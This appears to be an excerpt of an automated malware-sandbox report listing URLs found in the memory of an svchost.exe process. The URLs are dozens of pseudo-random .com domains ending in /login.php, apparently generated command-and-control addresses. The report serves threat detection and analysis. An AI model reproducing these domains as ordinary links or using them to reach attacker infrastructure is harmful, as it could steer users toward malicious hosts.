Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104066854.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2102181995.00000000066B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyniz.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2418245209.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462483307.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqih.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrez.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyviw.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyviw.com/login.phpI
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358756275.000000000B407000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364340115.000000000667A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364072195.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2144468325.000000000B5A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2149655639.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyvyz.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064129589.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzoz.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzys.com/login.php
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyfex.com/http://lyvywed.com/http://lygyfex.com/H
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046143782.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyfir.com/login.php
Source: svchost.exe, 00000002.00000003.2033528164.00000000066AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040073815.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034655522.00000000066A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029714857.00000000066AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyged.com/H
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040392407.000000000670A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyged.com/login.php
Source: svchost.exe, 00000002.00000003.2491008022.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjan.com/http://lygyjan.com/L&
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygylax.com/login.php
Source: svchost.exe, 00000002.00000003.2563141332.00000000066EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602659903.00000000066F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymod.com/
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575896409.000000000B5BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567335310.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564957391.000000000B5A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123556284.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559852805.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynyr.com/login.php
Source: svchost.exe, 00000002.00000003.2059929995.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083716272.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078402402.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088531280.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086240326.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066831254.00000000029CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysen.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894616327.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvar.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593963408.00000000029F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvuj.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywyj.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxad.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxun.com/login.php
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfax.com/http://lykyfax.com/http://pupypil.com/http://qedyxuq.com/http://qedyxuq.com/Xvj
Source: svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfud.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygaj.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796738953.00000000066C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793490988.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793720143.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790177343.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796578932.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793490988.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793720143.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796578932.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2265980241.00000000046F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymox.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyj.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykysix.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004799359.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998684932.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001263336.00000000066B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytej.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373519740.00000000066BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369279850.00000000066A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvod.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2021195264.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyxur.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
